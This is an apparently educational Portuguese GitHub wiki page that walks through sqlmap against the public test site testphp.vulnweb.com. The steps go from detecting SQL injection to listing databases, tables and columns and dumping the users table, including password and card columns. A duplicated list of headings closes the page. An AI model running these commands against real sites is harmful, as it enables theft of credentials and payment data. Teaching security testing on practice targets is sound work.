SQLMAP - LittlePlantXD/CyberGamer GitHub Wiki

Guia Simplificado do Sqlmap: Comandos e Argumentos Explicados

Lembrete Rápido:

SQL Injection: Falha que permite "injetar" comandos no banco de dados de um site.
Sqlmap: Ferramenta para automatizar a descoberta e exploração dessas falhas.
Alvo de Teste Seguro: http://testphp.vulnweb.com/listproducts.php?cat=1
⚠️ Aviso Legal: Use Sqlmap apenas com permissão. É ilegal atacar alvos sem consentimento.

Passo 1: Testar se a URL é vulnerável a SQL Injection

Objetivo: Descobrir se o site tem uma brecha de SQL Injection na URL fornecida.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1"

Argumentos Usados:

-u "http://testphp.vulnweb.com/listproducts.php?cat=1": Especifica a URL alvo que o Sqlmap vai testar.

Como Interpretar o Resultado Principal:

Sqlmap pode fazer perguntas interativas.
Procure pela mensagem: GET parameter 'cat' is vulnerable.
Serão mostrados tipo de SGBD, versão do PHP e outros dados relevantes.

Passo 2: Listar os Bancos de Dados (Databases) do Servidor

Objetivo: Ver quais bancos de dados existem no servidor.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs

Argumentos Usados:

--dbs: Lista todos os bancos de dados acessíveis.

Resultado Esperado:

available databases [2]:
[*] acuart
[*] information_schema

Passo 3: Listar as Tabelas dentro do Banco de Dados `acuart`

Objetivo: Descobrir as tabelas existentes em um banco de dados.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --tables

Argumentos Usados:

-D acuart: Define o banco de dados alvo.
--tables: Lista as tabelas desse banco.

Resultado Esperado:

Database: acuart
[8 tables]
+-----------+
| artists   |
| ...       |
| users     |
+-----------+

Passo 4: Listar as Colunas da Tabela `users`

Objetivo: Descobrir quais colunas existem na tabela.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --columns

Argumentos Usados:

-T users: Especifica a tabela.
--columns: Lista as colunas.

Resultado Esperado:

Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column  | Type         |
+---------+--------------+
| name    | varchar(100) |
| cc      | varchar(100) |
| pass    | varchar(100) |
| uname   | varchar(100) |
| ...     | ...          |
+---------+--------------+

Passo 5: Extrair (Dump) os Dados da Tabela `users`

Objetivo: Ver o conteúdo real da tabela.

Comando:

sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C "uname,pass,email,name,cc" --dump

Argumentos Usados:

-C "colunas": Define quais colunas extrair.
--dump: Faz o dump dos dados.

Resultado Esperado:

Dados reais extraídos e exibidos no terminal.

SQLMAP - LittlePlantXD/CyberGamer GitHub Wiki

Guia Simplificado do Sqlmap: Comandos e Argumentos Explicados

Lembrete Rápido:

Passo 1: Testar se a URL é vulnerável a SQL Injection

Comando:

Passo 2: Listar os Bancos de Dados (Databases) do Servidor

Comando:

Passo 3: Listar as Tabelas dentro do Banco de Dados acuart

Comando:

Passo 4: Listar as Colunas da Tabela users

Comando:

Passo 5: Extrair (Dump) os Dados da Tabela users

Comando:

Passo 3: Listar as Tabelas dentro do Banco de Dados `acuart`

Passo 4: Listar as Colunas da Tabela `users`

Passo 5: Extrair (Dump) os Dados da Tabela `users`